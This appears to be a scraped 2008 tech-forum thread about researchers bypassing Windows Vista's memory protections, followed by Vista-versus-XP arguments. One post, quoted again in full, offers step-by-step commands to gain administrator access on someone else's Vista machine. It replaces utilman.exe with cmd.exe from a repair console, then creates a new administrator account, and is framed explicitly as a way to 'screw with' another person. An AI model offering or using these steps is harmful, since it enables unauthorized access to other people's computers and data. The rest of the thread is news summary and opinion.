Jump to content

Vista's Security Rendered Completely Useless by New Exploit


105 posts in this topic

Recommended Posts

http://www.neowin.net/news/main/08/08/08/v...-by-new-exploit

 

This week at the Black Hat Security Conference two security researchers will discuss their findings which could completely bring Windows Vista to its knees.

 

Mark Dowd of IBM Internet Security Systems (ISS) and Alexander Sotirov, of VMware Inc. have discovered a technique that can be used to bypass all memory protection safeguards that Microsoft built into Windows Vista. These new methods have been used to get around Vista's Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP) and other protections by loading malicious content through an active web browser. The researchers were able to load whatever content they wanted into any location they wished on a user's machine using a variety of scripting languages, such as Java, ActiveX and even .NET objects. This feat was achieved by taking advantage of the way that Internet Explorer (and other browsers) handle active scripting in the Operating System.

 

While this may seem like any standard security hole, other researchers say that the work is a major breakthrough and there is very little that Microsoft can do to fix the problems. These attacks work differently than other security exploits, as they aren't based on any new Windows vulnerabilities, but instead take advantage of the way Microsoft chose to guard Vista's fundamental architecture. According to Dino Dai Zovi, a popular security researcher, "the genius of this is that it's completely reusable. They have attacks that let them load chosen content to a chosen location with chosen permissions. That's completely game over."

 

Have a lot of fun with Vista :dev:

Link to comment
Share on other sites

"This is not insanely technical. These two guys are capable of the really low-level technical attacks, but this is simple and reusable," Dai Zovi said. "I definitely think this will get reused soon."

 

Sending to the trash my 'BootCamp partition'...

Link to comment
Share on other sites

wanna really screw with someone that has vista?

 

How-To enable local Administrator access on a Vista system:

 

Boot off of any Vista DVD.

When you get to the first screen, select "Repair Your Computer", You should have an option for command prompt.

 

In Command Prompt, type the following:

 

c:

cd c:\windows\system32

ren utilman.exe utilman.old

copy cmd.exe utilman.exe

 

Remove the Vista DVD and reboot.

At the welcome screen, click the blue Accessibility button in the bottom left hand corner.

You should get a command prompt.

 

Type the following:

 

net user somebody 12345 /add

net localgroup Administrators somebody /add

 

(obviously replacing somebody and 12345 with whatever username and password you'd like.)

 

Give the computer a restart, you'll see the new account you've created.

You can now log in as an administrator. :(

Link to comment
Share on other sites

wanna really screw with someone that has vista?

 

How-To enable local Administrator access on a Vista system:

 

Boot off of any Vista DVD.

When you get to the first screen, select "Repair Your Computer", You should have an option for command prompt.

 

In Command Prompt, type the following:

 

c:

cd c:\windows\system32

ren utilman.exe utilman.old

copy cmd.exe utilman.exe

 

Remove the Vista DVD and reboot.

At the welcome screen, click the blue Accessibility button in the bottom left hand corner.

You should get a command prompt.

 

Type the following:

 

net user somebody 12345 /add

net localgroup Administrators somebody /add

 

(obviously replacing somebody and 12345 with whatever username and password you'd like.)

 

Give the computer a restart, you'll see the new account you've created.

You can now log in as an administrator. :(

 

It's very nice and easy to hack,

But I think user may want to make encryption to save his data :)

Link to comment
Share on other sites

I'm sure Microsoft can come up with a 'fix' of sorts that will prevent this from being overly exploited. I've been running Vista x64 with no Anti Virus for about 6 months now and haven't had a single issue. Of course I prefer OS 10, but if I have to have Windows around Vista is loads better than XP.

Link to comment
Share on other sites

Vista loads better than XP, that's a laugh. :lol: Next you'll be telling us laptop battery life is longer with Vista. :D What a joke.

 

This new type of exploit is wonderful. The big danger isn't to Vista users (nobody cares about them except the anti-virus vendors), the biggest danger is to Microsoft's DRM model which will now be totally compromised in short order. Once it becomes possible to load unsigned drivers and other code into the kernel space, the "trusted path" for hi-def content will be open for all to see and sniff.

 

I've read several articles about this in the last few days. It's not 1 exploit. It's a whole class of exploits that are possible because of the way .NET (and Java) work in IE. No-Execute memory protection is now worthless. The view of many people a lot smarter than I am, is that there is nothing MS can do to "patch" the holes. It's a fundamental flaw in the way Vista was designed.

Link to comment
Share on other sites

Vista loads better than XP, that's a laugh.

 

Laughing is only when it's a joke though...Vista loads faster than what XP did for me. And I gotta say, shame on you for doing something or something or other, haven't thought that far yet.

Link to comment
Share on other sites

I've read several articles about this in the last few days. It's not 1 exploit. It's a whole class of exploits that are possible because of the way .NET (and Java) work in IE. No-Execute memory protection is now worthless. The view of many people a lot smarter than I am, is that there is nothing MS can do to "patch" the holes. It's a fundamental flaw in the way Vista was designed.

 

Seconded.

Link to comment
Share on other sites

Vista loads better than XP, that's a laugh. :lol: Next you'll be telling us laptop battery life is longer with Vista. :) What a joke.

Vista is better than XP. After SP1, the 'performance hit' is increasingly minor, especially on computers made 2005 -> present. XP is dated and is really starting to show it. A fresh install comes with archaic applications that have no modern use, and is really lacking in end user features when compared to Vista. Vista has better hardware support, is more secure out of the box, comes with applications that better meet the needs of todays users, and has search and hardware acceleration amoung other things. Of course if one has XP there is no need to shell out $110 for Vista, but for people buying new computers Vista is a better alternative to XP.

Link to comment
Share on other sites

Vista is better than XP. After SP1, the 'performance hit' is increasingly minor, especially on computers made 2005 -> present. XP is dated and is really starting to show it. A fresh install comes with archaic applications that have no modern use, and is really lacking in end user features when compared to Vista. Vista has better hardware support, is more secure out of the box, comes with applications that better meet the needs of todays users, and has search and hardware acceleration amoung other things. Of course if one has XP there is no need to shell out $110 for Vista, but for people buying new computers Vista is a better alternative to XP.

I couldn't have said it better myself. (;

Link to comment
Share on other sites

I'm sure Microsoft can come up with a 'fix' of sorts that will prevent this from being overly exploited.

 

I read that it cannot be fixed, but I have no details D:

Link to comment
Share on other sites

MS did this study a while ago that I was reading about on slashdot, they took a bunch of XP users who thought Vista was no good but who had actually never used it and told they had this new prototype OS that they wanted all these people to test out. The testers thought the "new" OS was so much better than XP, really they were just using Vista with a few cosmetic changes.

Link to comment
Share on other sites

The testers thought the "new" OS was so much better than XP, really they were just using Vista with a few cosmetic changes.

 

The look is quite important. Many users, especially old geeks, find Aero hideous, over the top and hindering productivity.

Microsoft has given only "Classic" as an alternative, which is worse than Windows 98.

So if you want a decent alternative you must download and install your own. /off-topic.

Link to comment
Share on other sites

Vista is better than XP. After SP1, the 'performance hit' is increasingly minor, especially on computers made 2005 -> present. XP is dated and is really starting to show it. A fresh install comes with archaic applications that have no modern use, and is really lacking in end user features when compared to Vista. Vista has better hardware support, is more secure out of the box, comes with applications that better meet the needs of todays users, and has search and hardware acceleration amoung other things. Of course if one has XP there is no need to shell out $110 for Vista, but for people buying new computers Vista is a better alternative to XP.

 

For people buying new computers there is no choice in the matter. There IS a performance hit, and no matter how "minor" you think it is, it's foolish to embrace an "upgrade" that consumes more resources in return for no gain in core functionality.

 

Vista's search function consumes significant system resources (a lot like Mac's Spotlight) and is one of the first things many people turn off. XP installs "archaic applications" out of the box? The last time I checked, no OS installs Photoshop, Premiere, Adobe Acrobat, AutoCAD, 3DSMAX, or a top-shelf word processor/spreadsheet package out-of-the-box. You have to buy those separately. And XP runs them all faster than Vista.

 

Vista "comes with applications that better meet the needs of todays users"? :blink: That's pure marketing-speak. That's some strong Kool-Ade you're drinking there, my friend.

Link to comment
Share on other sites

MS did this study a while ago that I was reading about on slashdot, they took a bunch of XP users who thought Vista was no good but who had actually never used it and told they had this new prototype OS that they wanted all these people to test out. The testers thought the "new" OS was so much better than XP, really they were just using Vista with a few cosmetic changes.

http://www.mojaveexperiment.com/

Link to comment
Share on other sites

 Share

×
×
  • Create New...